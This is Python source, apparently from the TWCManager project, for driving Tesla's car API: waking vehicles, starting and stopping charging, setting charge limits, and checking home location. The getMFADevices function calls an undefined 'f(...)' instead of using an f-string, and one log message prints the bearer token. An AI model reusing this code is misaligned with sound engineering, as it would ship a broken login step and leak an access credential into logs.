logger.debug("Car API vehicle list" + str(apiResponseDict) + "\n")
for i in range(0, apiResponseDict["count"]):
self.addVehicle(apiResponseDict["response"][i])
self.resetCarApiLastErrorTime()
except (KeyError, TypeError):
# This catches cases like trying to access
# apiResponseDict['response'] when 'response' doesn't exist in
# apiResponseDict.
logger.log(
logging.INFO2,
"ERROR: Can't get list of vehicles via Tesla car API. Will try again in "
+ str(self.getCarApiErrorRetryMins())
+ " minutes.",
)
self.updateCarApiLastErrorTime()
return False
if self.getVehicleCount() > 0 and (charge or applyLimit):
# Wake cars if needed
for vehicle in self.getCarApiVehicles():
if charge is True and vehicle.stopAskingToStartCharging:
# Vehicle is in a state (complete or charging) already
# which doesn't make sense for us to keep requesting it
# to start charging, so we will stop.
logger.log(
logging.DEBUG2,
"Don't repeatedly request API to charge "
+ vehicle.name
+ ", because vehicle.stopAskingToStartCharging "
+ " == True - it has already been requested.",
)
continue
if applyLimit is True and vehicle.stopTryingToApplyLimit:
logger.log(
logging.DEBUG2,
"Don't wake "
+ vehicle.name
+ " to set the charge limit - it has already been set",
)
continue
if self.getCarApiRetryRemaining():
# It's been under carApiErrorRetryMins minutes since the car
# API generated an error on this vehicle. Don't send it more
# commands yet.
logger.log(
logging.DEBUG2,
"Don't send commands to "
+ vehicle.name
+ " because it returned an error in the last "
+ str(self.getCarApiErrorRetryMins())
+ " minutes.",
)
continue
if vehicle.ready():
continue
if now - vehicle.lastAPIAccessTime <= vehicle.delayNextWakeAttempt:
logger.debug(
"car_api_available returning False because we are still delaying "
+ str(vehicle.delayNextWakeAttempt)
+ " seconds after the last failed wake attempt."
)
return False
# It's been delayNextWakeAttempt seconds since we last failed to
# wake the car, or it's never been woken. Wake it.
apiResponseDict = self.wakeVehicle(vehicle)
state = "error"
logger.debug("Car API wake car response" + str(apiResponseDict))
try:
state = apiResponseDict["response"]["state"]
self.resetCarApiLastErrorTime()
except (KeyError, TypeError):
# This catches unexpected cases like trying to access
# apiResponseDict['response'] when 'response' doesn't exist
# in apiResponseDict.
state = "error"
if state == "online":
# With max power saving settings, car will almost always
# report 'asleep' or 'offline' the first time it's sent
# wake_up. Rarely, it returns 'online' on the first wake_up
# even when the car has not been contacted in a long while.
# I suspect that happens when we happen to query the car
# when it periodically awakens for some reason.
vehicle.firstWakeAttemptTime = 0
vehicle.delayNextWakeAttempt = 0
# Don't alter vehicle.lastAPIAccessTime because
# vehicle.ready() uses it to return True if the last wake
# was under 2 mins ago.
needSleep = True
else:
if vehicle.firstWakeAttemptTime == 0:
vehicle.firstWakeAttemptTime = now
if state == "asleep" or state == "waking":
self.resetCarApiLastErrorTime()
if now - vehicle.firstWakeAttemptTime <= 10 * 60:
# http://visibletesla.com has a 'force wakeup' mode
# that sends wake_up messages once every 5 seconds
# 15 times. This generally manages to wake my car if
# it's returning 'asleep' state, but I don't think
# there is any reason for 5 seconds and 15 attempts.
# The car did wake in two tests with that timing,
# but on the third test, it had not entered online
# mode by the 15th wake_up and took another 10+
# seconds to come online. In general, I hear relays
# in the car clicking a few seconds after the first
# wake_up but the car does not enter 'waking' or
# 'online' state for a random period of time. I've
# seen it take over one minute, 20 sec.
#
# I interpret this to mean a car in 'asleep' mode is
# still receiving car API messages and will start
# to wake after the first wake_up, but it may take
# awhile to finish waking up. Therefore, we try
# waking every 30 seconds for the first 10 mins.
vehicle.delayNextWakeAttempt = 30
elif now - vehicle.firstWakeAttemptTime <= 70 * 60:
# Cars in 'asleep' state should wake within a
# couple minutes in my experience, so we should
# never reach this point. If we do, try every 5
# minutes for the next hour.
vehicle.delayNextWakeAttempt = 5 * 60
else:
# Car hasn't woken for an hour and 10 mins. Try
# again in 15 minutes. We'll show an error about
# reaching this point later.
vehicle.delayNextWakeAttempt = 15 * 60
elif state == "offline":
self.resetCarApiLastErrorTime()
# In any case it makes sense to wait 5 seconds here.
# I once hit an issue where the next command was sent too
# quickly, and only a reboot of the Raspberry Pi made it
# possible to reconnect to the API (even the Tesla app
# couldn't connect anymore).
time.sleep(5)
if now - vehicle.firstWakeAttemptTime <= 31 * 60:
# A car in offline state is presumably not connected
# wirelessly so our wake_up command will not reach
# it. Instead, the car wakes itself every 20-30
# minutes and waits some period of time for a
# message, then goes back to sleep. I'm not sure
# what the period of time is, so I tried sending
# wake_up every 55 seconds for 16 minutes but the
# car failed to wake.
# Next I tried once every 25 seconds for 31 mins.
# This worked after 19.5 and 19.75 minutes in 2
# tests but I can't be sure the car stays awake for
# 30secs or if I just happened to send a command
# during a shorter period of wakefulness.
vehicle.delayNextWakeAttempt = 25
# I've run tests sending wake_up every 10-30 mins to
# a car in offline state and it will go hours
# without waking unless you're lucky enough to hit
# it in the brief time it's waiting for wireless
# commands. I assume cars only enter offline state
# when set to max power saving mode, and even then,
# they don't always enter the state even after 8
# hours of no API contact or other interaction. I've
# seen it remain in 'asleep' state when contacted
# after 16.5 hours, but I also think I've seen it in
# offline state after less than 16 hours, so I'm not
# sure what the rules are or if maybe Tesla contacts
# the car periodically which resets the offline
# countdown.
#
# I've also seen it enter 'offline' state a few
# minutes after finishing charging, then go 'online'
# on the third retry every 55 seconds. I suspect
# that might be a case of the car briefly losing
# wireless connection rather than actually going
# into a deep sleep.
# 'offline' may happen almost immediately if you
# don't have the charger plugged in.
else:
# Handle 'error' state.
self.updateCarApiLastErrorTime()
if now - vehicle.firstWakeAttemptTime >= 60 * 60:
# Car hasn't woken for over an hour. Try again
# in 15 minutes. We'll show an error about this
# later.
vehicle.delayNextWakeAttempt = 15 * 60
if state == "error":
logger.info(
"Car API wake car failed with unknown response. "
+ "Will try again in "
+ str(vehicle.delayNextWakeAttempt)
+ " seconds."
)
else:
logger.info(
"Car API wake car failed. State remains: '"
+ state
+ "'. Will try again in "
+ str(vehicle.delayNextWakeAttempt)
+ " seconds."
)
if (
vehicle.firstWakeAttemptTime > 0
and now - vehicle.firstWakeAttemptTime > 60 * 60
):
# It should never take over an hour to wake a car. If it
# does, ask user to report an error.
logger.info(
"ERROR: We have failed to wake a car from '"
+ state
+ "' state for %.1f hours.\n"
"Please file an issue at https://github.com/ngardiner/TWCManager/. "
"Also include this: %s"
% (
((now - vehicle.firstWakeAttemptTime) / 60 / 60),
str(apiResponseDict),
)
)
if (
now - self.getCarApiLastErrorTime() < (self.getCarApiErrorRetryMins() * 60)
or self.getCarApiBearerToken() == ""
):
logger.log(
logging.INFO8,
"car_api_available returning False because of recent carApiLasterrorTime "
+ str(now - self.getCarApiLastErrorTime())
+ " or empty carApiBearerToken '"
+ self.getCarApiBearerToken()
+ "'",
)
return False
# We return True to indicate there was no error that prevents running
# car API commands and that we successfully got a list of vehicles.
# True does not indicate that any vehicle is actually awake and ready
# for commands.
logger.log(logging.INFO8, "car_api_available returning True")
if needSleep:
# If you send charge_start/stop less than 1 second after calling
# update_location(), the charge command usually returns:
# {'response': {'result': False, 'reason': 'could_not_wake_buses'}}
# I'm not sure if the same problem exists when sending commands too
# quickly after we send wake_up. I haven't seen a problem sending a
# command immediately, but it seems safest to sleep 5 seconds after
# waking before sending a command.
time.sleep(5)
return True
def is_location_home(self, lat, lon):
if self.master.getHomeLatLon()[0] == 10000:
logger.info(
"Home location for vehicles has never been set. "
+ "We'll assume home is where we found the first vehicle currently parked. "
+ "Home set to lat="
+ str(lat)
+ ", lon="
+ str(lon)
)
self.master.setHomeLat(lat)
self.master.setHomeLon(lon)
self.master.queue_background_task({"cmd": "saveSettings"})
return True
# 1 degree of lat or lon = ~364488.888 feet. The exact figure differs depending
# on the latitude, but this value should be close enough for our rough needs.
# 1/364488.888 * 10560 = 0.0289.
# So if the vehicle is within 0.0289 lat and lon of homeLat/Lon,
# it's within ~10560 feet (2 miles) of home and we'll consider it to be
# at home.
# I originally tried using 0.00548 (~2000 feet) but one night the car
# consistently reported being 2839 feet away from home despite being
# parked in the exact spot I always park it. This is very odd because
# GPS is supposed to be accurate to within 12 feet. Tesla phone app
# also reports the car is not at its usual address. I suspect this
# is another case of a bug that's been causing car GPS to freeze the
# last couple months.
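# Worked example with hypothetical coordinates: if homeLat is 37.4849 and the
# car reports lat 37.5100, the difference is 0.0251 degrees, which is under
# 0.0289 (~2 miles), so the latitude check alone would still treat the car as
# at home.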
if (
abs(self.master.getHomeLatLon()[0] - lat) > 0.0289
or abs(self.master.getHomeLatLon()[1] - lon) > 0.0289
):
return False
return True
def car_api_charge(self, charge):
# Do not call this function directly. Call by using background thread:
# queue_background_task({'cmd':'charge', 'charge':<True/False>})
now = time.time()
apiResponseDict = {}
if not charge:
# Whenever we are going to tell vehicles to stop charging, set
# vehicle.stopAskingToStartCharging = False on all vehicles.
for vehicle in self.getCarApiVehicles():
vehicle.stopAskingToStartCharging = False
if now - self.getLastStartOrStopChargeTime() < 60:
# Don't start or stop more often than once a minute
logger.log(
logging.DEBUG2,
"car_api_charge return because not long enough since last carApiLastStartOrStopChargeTime",
)
return "error"
if self.car_api_available(charge=charge) is False:
logger.log(
logging.INFO8,
"car_api_charge return because car_api_available() == False",
)
return "error"
startOrStop = "start" if charge else "stop"
result = "success"
logger.log(logging.INFO8, "startOrStop is set to " + str(startOrStop))
for vehicle in self.getCarApiVehicles():
if charge and vehicle.stopAskingToStartCharging:
logger.log(
logging.INFO8,
"Don't charge "
+ vehicle.name
+ " because vehicle.stopAskingToStartCharging == True",
)
continue
if not vehicle.ready():
continue
if (
vehicle.update_charge()
and vehicle.batteryLevel < self.minChargeLevel
and not charge
):
# If the vehicle's charge state is lower than the configured minimum,
# don't stop it from charging, even if we'd otherwise not charge.
continue
# Only update carApiLastStartOrStopChargeTime if car_api_available() managed
# to wake cars. Setting this prevents any command below from being sent
# more than once per minute.
self.updateLastStartOrStopChargeTime()
if (
self.config["config"]["onlyChargeMultiCarsAtHome"]
and self.getVehicleCount() > 1
):
# When multiple cars are enrolled in the car API, only start/stop
# charging cars parked at home.
if vehicle.update_location() is False:
result = "error"
continue
if not vehicle.atHome:
# Vehicle is not at home, so don't change its charge state.
logger.info(
vehicle.name
+ " is not at home. Do not "
+ startOrStop
+ " charge."
)
continue
# If you send charge_start/stop less than 1 second after calling
# update_location(), the charge command usually returns:
# {'response': {'result': False, 'reason': 'could_not_wake_buses'}}
# Waiting 2 seconds seems to consistently avoid the error, but let's
# wait 5 seconds in case of hardware differences between cars.
time.sleep(5)
if charge:
self.applyChargeLimit(self.lastChargeLimitApplied, checkArrival=True)
url = "https://owner-api.teslamotors.com/api/1/vehicles/"
url = url + str(vehicle.ID) + "/command/charge_" + startOrStop
headers = {
"accept": "application/json",
"Authorization": "Bearer " + self.getCarApiBearerToken(),
}
# Retry up to 3 times on certain errors.
for _ in range(0, 3):
try:
req = requests.post(url, headers=headers)
logger.log(
logging.INFO8,
"Car API cmd charge_" + startOrStop + " " + str(req),
)
apiResponseDict = json.loads(req.text)
except requests.exceptions.RequestException:
pass
except json.decoder.JSONDecodeError:
pass
try:
logger.log(
logging.INFO4,
vehicle.name
+ ": "
+ startOrStop
+ " charge response"
+ str(apiResponseDict),
)
# Responses I've seen in apiResponseDict:
# Car is done charging:
# {'response': {'result': False, 'reason': 'complete'}}
# Car wants to charge but may not actually be charging. Oddly, this
# is the state reported when car is not plugged in to a charger!
# It's also reported when plugged in but charger is not offering
# power or even when the car is in an error state and refuses to
# charge.
# {'response': {'result': False, 'reason': 'charging'}}
# Car not reachable:
# {'response': None, 'error_description': '', 'error': 'vehicle unavailable: {:error=>"vehicle unavailable:"}'}
# This weird error seems to happen randomly and re-trying a few
# seconds later often succeeds:
# {'response': {'result': False, 'reason': 'could_not_wake_buses'}}
# I've seen this a few times on wake_up, charge_start, and drive_state:
# {'error': 'upstream internal error', 'response': None, 'error_description': ''}
# I've seen this once on wake_up:
# {'error': 'operation_timedout for txid `4853e3ad74de12733f8cc957c9f60040`}', 'response': None, 'error_description': ''}
# Start or stop charging success:
# {'response': {'result': True, 'reason': ''}}
if apiResponseDict["response"] is None:
# This generally indicates an error like 'vehicle
# unavailable', but it's not something I think the caller can do
# anything about, so return generic 'error'.
result = "error"
# Don't send another command to this vehicle for
# carApiErrorRetryMins mins.
self.updateCarApiLastErrorTime(vehicle)
else:
if apiResponseDict["response"]["result"] == True:
self.resetCarApiLastErrorTime(vehicle)
elif charge:
reason = apiResponseDict["response"]["reason"]
if reason == "complete" or reason == "charging":
# We asked the car to charge, but it responded that
# it can't, either because it's reached target
# charge state (reason == 'complete'), or it's
# already trying to charge (reason == 'charging').
# In these cases, it won't help to keep asking it to
# charge, so set vehicle.stopAskingToStartCharging =
# True.
#
# Remember, this only means at least one car in the
# list wants us to stop asking and we don't know
# which car in the list is connected to our TWC.
logger.info(
vehicle.name
+ " is done charging or already trying to charge. Stop asking to start charging."
)
vehicle.stopAskingToStartCharging = True
self.resetCarApiLastErrorTime(vehicle)
elif reason == "could_not_wake_buses":
# This error often happens if you call
# charge_start too quickly after another command
# like drive_state. Even if you delay 5 seconds
# between the commands, this error still comes
# up occasionally. Retrying often succeeds, so
# wait 5 secs and retry.
# If all retries fail, we'll try again in a
# minute because we set
# carApiLastStartOrStopChargeTime = now earlier.
time.sleep(5)
continue
else:
# Start charge failed with an error I
# haven't seen before, so wait
# carApiErrorRetryMins mins before trying again.
logger.info(
'ERROR "'
+ reason
+ '" when trying to '
+ startOrStop
+ " car charging via Tesla car API. Will try again later."
+ "\nIf this error persists, please file an issue at https://github.com/ngardiner/TWCManager/ with a copy of this error.",
)
result = "error"
self.updateCarApiLastErrorTime(vehicle)
else:
# Stop charge failed with an error I
# haven't seen before, so wait
# carApiErrorRetryMins mins before trying again.
reason = apiResponseDict["response"]["reason"]
logger.info(
'ERROR "'
+ reason
+ '" when trying to '
+ startOrStop
+ " car charging via Tesla car API. Will try again later."
+ "\nIf this error persists, please file an issue at https://github.com/ngardiner/TWCManager/ with a copy of this error.",
)
result = "error"
self.updateCarApiLastErrorTime(vehicle)
except (KeyError, TypeError):
# This catches cases like trying to access
# apiResponseDict['response'] when 'response' doesn't exist in
# apiResponseDict.
logger.info(
"ERROR: Failed to "
+ startOrStop
+ " car charging via Tesla car API. Will try again later."
)
self.updateCarApiLastErrorTime(vehicle)
break
if self.getLastStartOrStopChargeTime() == now:
logger.info("Car API " + startOrStop + " charge result: " + result)
return result
def applyChargeLimit(self, limit, checkArrival=False, checkDeparture=False):
if limit != -1 and (limit < 50 or limit > 100):
logger.log(logging.INFO8, "applyChargeLimit skipped")
return "error"
if not self.car_api_available():
logger.log(
logging.INFO8,
"applyChargeLimit return because car_api_available() == False",
)
return "error"
now = time.time()
if (
not checkArrival
and not checkDeparture
and now - self.carApiLastChargeLimitApplyTime < 60
):
# Don't change limits more often than once a minute
logger.log(
logging.DEBUG2,
"applyChargeLimit return because under 60 sec since last carApiLastChargeLimitApplyTime",
)
return "error"
# We need to try to apply limits if:
# - We think the car is at home and the limit has changed
# - We think the car is at home and we've been asked to check for departures
# - We think the car is at home and we notice it gone
# - We think the car is away from home and we've been asked to check for arrivals
#
# We do NOT opportunistically check for arrivals, because that would be a
# continuous API poll.
needToWake = False
for vehicle in self.carApiVehicles:
(wasAtHome, outside, lastApplied) = self.master.getNormalChargeLimit(
vehicle.ID
)
# Don't wake cars to tell them about reduced limits;
# only wake if they might be able to charge further now
if wasAtHome and (limit > (lastApplied if lastApplied != -1 else outside)):
needToWake = True
vehicle.stopAskingToStartCharging = False
if (
wasAtHome
and (
limit != lastApplied
or checkDeparture
or (vehicle.update_location(cacheTime=3600) and not vehicle.atHome)
)
) or (not wasAtHome and checkArrival):
vehicle.stopTryingToApplyLimit = False
if needToWake and self.car_api_available(applyLimit=True) is False:
logger.log(
logging.INFO8,
"applyChargeLimit return because car_api_available() == False",
)
return "error"
if self.lastChargeLimitApplied != limit:
if limit != -1:
logger.log(
logging.INFO2,
"Attempting to apply limit of "
+ str(limit)
+ "% to all vehicles at home",
)
else:
logger.log(
logging.INFO2,
"Attempting to restore charge limits for all vehicles at home",
)
self.lastChargeLimitApplied = limit
self.carApiLastChargeLimitApplyTime = now
needSleep = False
for vehicle in self.carApiVehicles:
if vehicle.stopTryingToApplyLimit or not vehicle.ready():
continue
located = vehicle.update_location()
(wasAtHome, outside, lastApplied) = self.master.getNormalChargeLimit(
vehicle.ID
)
forgetVehicle = False
if not vehicle.update_charge():
# We failed to read the "normal" limit; don't risk changing it.
continue
if not wasAtHome and located and vehicle.atHome:
logger.log(logging.INFO2, vehicle.name + " has arrived")
outside = vehicle.chargeLimit
elif wasAtHome and located and not vehicle.atHome:
logger.log(logging.INFO2, vehicle.name + " has departed")
forgetVehicle = True
if limit == -1 or (located and not vehicle.atHome):
# We're removing any applied limit, provided it hasn't been manually changed
#
# If lastApplied == -1, the manual-change path is always selected.
if wasAtHome and vehicle.chargeLimit == lastApplied:
if vehicle.apply_charge_limit(outside):
logger.log(
logging.INFO2,
"Restoring "
+ vehicle.name
+ " to charge limit "
+ str(outside)
+ "%",
)
vehicle.stopTryingToApplyLimit = True
else:
# If the charge limit has been manually changed, user action overrides the
# saved charge limit. Leave it alone.
vehicle.stopTryingToApplyLimit = True
outside = vehicle.chargeLimit
if vehicle.stopTryingToApplyLimit:
if forgetVehicle:
self.master.removeNormalChargeLimit(vehicle.ID)
else:
self.master.saveNormalChargeLimit(vehicle.ID, outside, -1)
else:
if vehicle.chargeLimit != limit:
if vehicle.apply_charge_limit(limit):
logger.log(
logging.INFO2,
"Set "
+ vehicle.name
+ " to charge limit of "
+ str(limit)
+ "%",
)
vehicle.stopTryingToApplyLimit = True
else:
vehicle.stopTryingToApplyLimit = True
if vehicle.stopTryingToApplyLimit:
self.master.saveNormalChargeLimit(vehicle.ID, outside, limit)
if vehicle.atHome and vehicle.stopTryingToApplyLimit:
needSleep = True
if needSleep:
# If you start charging too quickly after setting the charge limit,
# the vehicle sometimes refuses the start command because it's
# "fully charged" under the old limit, but then continues to say
# charging was stopped once the new limit is in place.
time.sleep(5)
if checkArrival:
self.updateChargeAtHome()
def getApiCaptcha(self):
# This will fetch the current Captcha image displayed by Tesla's auth
# website, and store it in memory
self.__apiCaptcha = self.session.get(self.captchaURL)
def getCaptchaImage(self):
# This will serve the Tesla Captcha image
if self.__apiCaptcha:
return self.__apiCaptcha.content
else:
logger.log(
logging.INFO2,
"ERROR: Captcha image requested, but we have none buffered. This is likely due to a stale login session, but if you see it regularly, please report it.",
)
return ""
def getCarApiBearerToken(self):
return self.carApiBearerToken
def getCarApiErrorRetryMins(self, vehicle=None):
errorCount = self.errorCount
if vehicle:
errorCount = max(vehicle.errorCount, errorCount)
errorCount = max(errorCount - 1, 0)
return min(errorCount, 10)
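# Rough sketch of the resulting backoff ladder (assuming only the global
# errorCount is set): 1 error -> wait 0 min, 2 errors -> 1 min, 3 errors -> 2 min,
# and from 11 errors onward the delay is capped at 10 minutes.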
def getCarApiLastErrorTime(self):
return self.carApiLastErrorTime
def getCarApiRefreshToken(self):
return self.carApiRefreshToken
def getCarApiRetryRemaining(self, vehicle=None):
# Calculate the amount of time remaining until the API can be queried
# again. This is the api backoff time minus the difference between now
# and the last error time
# The optional vehicle parameter allows factoring in the last error time
# of an individual vehicle, rather than just the API as a whole.
lastError = self.getCarApiLastErrorTime()
if vehicle:
lastError = max(vehicle.lastErrorTime, lastError)
if lastError == 0:
return 0
else:
backoff = self.getCarApiErrorRetryMins(vehicle) * 60
lasterrortime = time.time() - lastError
if lasterrortime >= backoff:
return 0
else:
logger.log(
logging.DEBUG2,
"Backoff is "
+ str(backoff)
+ ", lasterror delta is "
+ str(lasterrortime)
+ ", last error was "
+ str(lastError),
)
return int(backoff - lasterrortime)
def getCarApiTokenExpireTime(self):
return self.carApiTokenExpireTime
def getLastStartOrStopChargeTime(self):
return int(self.carApiLastStartOrStopChargeTime)
def getVehicleByID(self, vehicleID):
# Returns the vehicle object identified by the given ID
for vehicle in self.getCarApiVehicles():
if vehicle.ID == vehicleID:
return vehicle
return False
def getVehicleCount(self):
# Returns the number of currently tracked vehicles
return int(len(self.carApiVehicles))
def getCarApiVehicles(self):
return self.carApiVehicles
def getMFADevices(self, transaction_id):
# Requests a list of devices we can use for MFA
url = f(
"https://auth.tesla.com/oauth2/v3/authorize/mfa/factors?transaction_id={transaction_id}"
)
resp = self.session.get(url)
try:
content = json.loads(resp.text)
except ValueError:
return False
except json.decoder.JSONDecodeError:
return False
if resp.status_code == 200:
return content["data"]
elif resp.status_code == 400:
logger.error(
"The following error was returned when attempting to fetch MFA devices for Tesla Login:"
+ str(content.get("error", ""))
)
else:
logger.error(
"An unexpected error code ("
+ str(resp.status_code)
+ ") was returned when attempting to fetch MFA devices for Tesla Login"
)
def mfaLogin(self, transactionID, mfaDevice, mfaCode):
data = {
"transaction_id": transactionID,
"factor_id": mfaDevice,
"passcode": str(mfaCode).rjust(6, "0"),
}
url = "https://auth.tesla.com/oauth2/v3/authorize/mfa/verify"
resp = self.session.post(url, json=data)
try:
jsonData = json.loads(resp.text)
except ValueError:
return False
except json.decoder.JSONDecodeError:
return False
if (
"error" in resp.text
or not jsonData.get("data", None)
or not jsonData["data"].get("approved", None)
or not jsonData["data"].get("valid", None)
):
if (
jsonData.get("error", {}).get("message", None)
== "Invalid Attributes: Your passcode should be six digits."
):
return "TokenLengthError"
else:
return "TokenFail"
else:
data = {"transaction_id": transactionID}
return self.apiLoginPhaseTwo(data)
def resetCarApiLastErrorTime(self, vehicle=None):
self.carApiLastErrorTime = 0
if vehicle:
vehicle.lastErrorTime = 0
vehicle.errorCount = 0
self.errorCount = 0
return True
def setCarApiBearerToken(self, token=None):
if token:
# TODO: Should not be hardcoded
tokenSync = False
if self.master.tokenSyncEnabled():
# We won't accept tokens if Token Sync is already in place
return False
else:
self.carApiBearerToken = token
return True
else:
return False
def setCarApiRefreshToken(self, token):
self.carApiRefreshToken = token
return True
def setCarApiTokenExpireTime(self, value):
self.carApiTokenExpireTime = value
return True
def setChargeRate(self, charge_rate, vehicle=None):
# As a fallback to allow an initial implementation of the charge rate
# functionality for single-car installs, if no vehicle is specified we take
# the first one returned to us.
if not vehicle:
vehicle = self.getCarApiVehicles()[0]
vehicle.lastAPIAccessTime = time.time()
url = "https://owner-api.teslamotors.com/api/1/vehicles/"
url = url + str(vehicle.ID) + "/command/set_charging_amps"
headers = {
"accept": "application/json",
"Authorization": "Bearer " + self.getCarApiBearerToken(),
}
body = {"charging_amps": charge_rate}
try:
req = requests.post(url, headers=headers, json=body)
logger.log(logging.INFO8, "Car API cmd set_charging_amps" + str(req))
apiResponseDict = json.loads(req.text)
except requests.exceptions.RequestException:
return False
except json.decoder.JSONDecodeError:
return False
return apiResponseDict
def submitCaptchaCode(self, code, interface):
self.__apiCaptchaCode = code
self.__apiCaptchaInterface = interface
return self.apiLoginPhaseOne()
def updateCarApiLastErrorTime(self, vehicle=None):
timestamp = time.time()
logger.log(
logging.INFO8,
"updateCarApiLastErrorTime() called due to Tesla API Error. Updating timestamp from "
+ str(self.carApiLastErrorTime)
+ " to "
+ str(timestamp),
)
if vehicle:
vehicle.lastErrorTime = timestamp
vehicle.errorCount += 1
else:
self.carApiLastErrorTime = timestamp
self.errorCount += 1
return True
def updateLastStartOrStopChargeTime(self):
self.carApiLastStartOrStopChargeTime = time.time()
return True
def updateChargeAtHome(self):
for car in self.carApiVehicles:
if car.atHome:
car.update_charge()
self.lastChargeCheck = time.time()
def wakeVehicle(self, vehicle):
apiResponseDict = None
vehicle.lastAPIAccessTime = time.time()
url = "https://owner-api.teslamotors.com/api/1/vehicles/"
url = url + str(vehicle.ID) + "/wake_up"
headers = {
"accept": "application/json",
"Authorization": "Bearer " + self.getCarApiBearerToken(),
}
try:
req = requests.post(url, headers=headers)
logger.log(logging.INFO8, "Car API cmd wake_up" + str(req))
apiResponseDict = json.loads(req.text)
except requests.exceptions.RequestException:
return False
except json.decoder.JSONDecodeError:
return False
return apiResponseDict
@property
def numCarsAtHome(self):
return len([car for car in self.carApiVehicles if car.atHome])
@property
def minBatteryLevelAtHome(self):
if time.time() - self.lastChargeCheck > self.chargeUpdateInterval:
self.master.queue_background_task({"cmd": "checkCharge"})
return min(
[car.batteryLevel for car in self.carApiVehicles if car.atHome],
default=10000,
)
class CarApiVehicle:
carapi = None
__config = None
debuglevel = 0
ID = None
name = ""
syncSource = "TeslaAPI"
VIN = ""
firstWakeAttemptTime = 0
lastAPIAccessTime = 0
delayNextWakeAttempt = 0
lastLimitAttemptTime = 0
errorCount = 0
lastErrorTime = 0
lastDriveStatusTime = 0
lastChargeStatusTime = 0
stopAskingToStartCharging = False
stopTryingToApplyLimit = False
batteryLevel = 10000
chargeLimit = -1
lat = 10000
lon = 10000
atHome = False
timeToFullCharge = 0.0
# Sync values are updated by an external module such as TeslaMate
syncTimestamp = 0
syncTimeout = 60 * 60
syncLat = 10000
syncLon = 10000
syncState = "asleep"
def __init__(self, json, carapi, config):
self.carapi = carapi
self.__config = config
self.ID = json["id"]
self.VIN = json["vin"]
self.name = json["display_name"]
# Launch sync monitoring thread
Thread(target=self.checkSyncNotStale).start()
def checkSyncNotStale(self):
# Once an external system begins providing sync functionality to defer
# Tesla API queries and provide already fetched information, there is a
# potential condition which may occur in which the external system goes
# away and leaves us with stale data.
# To guard against this, this threaded function will loop every x minutes
# and check the last sync timestamp. If it has not updated in that interval,
# we switch back to using the API
while True:
if (
self.syncSource != "TeslaAPI"
and self.is_awake()
and (self.syncTimestamp < (time.time() - self.syncTimeout))
):
logger.error(
"Data from "
+ self.syncSource
+ " for "
+ self.name
+ " is stale. Switching back to TeslaAPI"
)
self.syncSource = "TeslaAPI"
time.sleep(self.syncTimeout)
def ready(self):
if self.carapi.getCarApiRetryRemaining(self):
# It's been under carApiErrorRetryMins minutes since the car API
# generated an error on this vehicle. Return that car is not ready.
logger.log(
logging.INFO8,
self.name
+ " not ready because of recent lastErrorTime "
+ str(self.lastErrorTime),
)
return False
if (
self.firstWakeAttemptTime == 0
and time.time() - self.lastAPIAccessTime < 2 * 60
):
# If it's been less than 2 minutes since we successfully woke this car, it
# should still be awake. No need to check. It returns to sleep state about
# two minutes after the last command was issued.
return True
# This can check whether the car is online; if so, it will likely stay online for
# two minutes.
if self.is_awake():
self.firstWakeAttemptTime = 0
return True
logger.log(
logging.INFO8,
self.name + " not ready because it wasn't woken in the last 2 minutes.",
)
return False
# Permits opportunistic API requests
def is_awake(self):
if self.syncSource == "TeslaAPI":
url = "https://owner-api.teslamotors.com/api/1/vehicles/" + str(self.ID)
(result, response) = self.get_car_api(
url, checkReady=False, provesOnline=False
)
return result and response.get("state", "") == "online"
else:
return (
self.syncState == "online"
or self.syncState == "charging"
or self.syncState == "updating"
or self.syncState == "driving"
)
def get_car_api(self, url, checkReady=True, provesOnline=True):
if checkReady and not self.ready():
return False, None
apiResponseDict = {}
headers = {
"accept": "application/json",
"Authorization": "Bearer " + self.carapi.getCarApiBearerToken(),
}
# Retry up to 3 times on certain errors.
for _ in range(0, 3):
try:
req = requests.get(url, headers=headers)
logger.log(logging.INFO8, "Car API cmd " + url + " " + str(req))
apiResponseDict = json.loads(req.text)
# This error can happen here as well:
# {'response': {'reason': 'could_not_wake_buses', 'result': False}}
# This one is somewhat common:
# {'response': None, 'error': 'vehicle unavailable: {:error=>"vehicle unavailable:"}', 'error_description': ''}
except requests.exceptions.RequestException:
pass
except json.decoder.JSONDecodeError:
pass
try:
logger.debug("Car API vehicle status" + str(apiResponseDict))
response = apiResponseDict["response"]
# A successful call to drive_state will not contain a
# response['reason'], so we check if the 'reason' key exists.
if (
"reason" in response
and response["reason"] == "could_not_wake_buses"
):
# Retry after 5 seconds. See notes in car_api_charge where
# 'could_not_wake_buses' is handled.
time.sleep(5)
continue
except (KeyError, TypeError):
# This catches cases like trying to access
# apiResponseDict['response'] when 'response' doesn't exist in
# apiResponseDict.
logger.info(
"ERROR: Can't access vehicle status for "
+ self.name
+ ". Will try again later."
)
self.carapi.updateCarApiLastErrorTime(self)
return False, None
if provesOnline:
self.lastAPIAccessTime = time.time()
return (True, response)
else:
self.carapi.updateCarApiLastErrorTime(self)
return (False, None)
def update_location(self, cacheTime=60):
if self.syncSource == "TeslaAPI":
url = "https://owner-api.teslamotors.com/api/1/vehicles/"
url = url + str(self.ID) + "/data_request/drive_state"
now = time.time()
if now - self.lastDriveStatusTime < cacheTime:
return True
try:
(result, response) = self.get_car_api(url)
except TypeError:
logger.error("Got None response from get_car_api()")
return False
if result:
self.lastDriveStatusTime = now
self.lat = response["latitude"]
self.lon = response["longitude"]
self.atHome = self.carapi.is_location_home(self.lat, self.lon)
return result
else:
self.lat = self.syncLat
self.lon = self.syncLon
self.atHome = self.carapi.is_location_home(self.lat, self.lon)
return True
def update_charge(self):
if self.syncSource == "TeslaAPI":
url = "https://owner-api.teslamotors.com/api/1/vehicles/"
url = url + str(self.ID) + "/data_request/charge_state"
now = time.time()
if now - self.lastChargeStatusTime < 60:
return True
try:
(result, response) = self.get_car_api(url)
except TypeError:
logger.error("Got None response from get_car_api()")
return False
if result:
self.lastChargeStatusTime = time.time()
self.chargeLimit = response["charge_limit_soc"]
self.batteryLevel = response["battery_level"]
self.timeToFullCharge = response["time_to_full_charge"]
return result
else:
return True
def apply_charge_limit(self, limit):
if self.stopTryingToApplyLimit:
return True
now = time.time()
if (
now - self.lastLimitAttemptTime <= 300
or self.carapi.getCarApiRetryRemaining(self)
):
return False
if self.ready() is False:
return False
self.lastLimitAttemptTime = now
url = "https://owner-api.teslamotors.com/api/1/vehicles/"
url = url + str(self.ID) + "/command/set_charge_limit"
headers = {
"accept": "application/json",
"Authorization": "Bearer " + self.carapi.getCarApiBearerToken(),
}
body = {"percent": limit}
for _ in range(0, 3):
try:
req = requests.post(url, headers=headers, json=body)
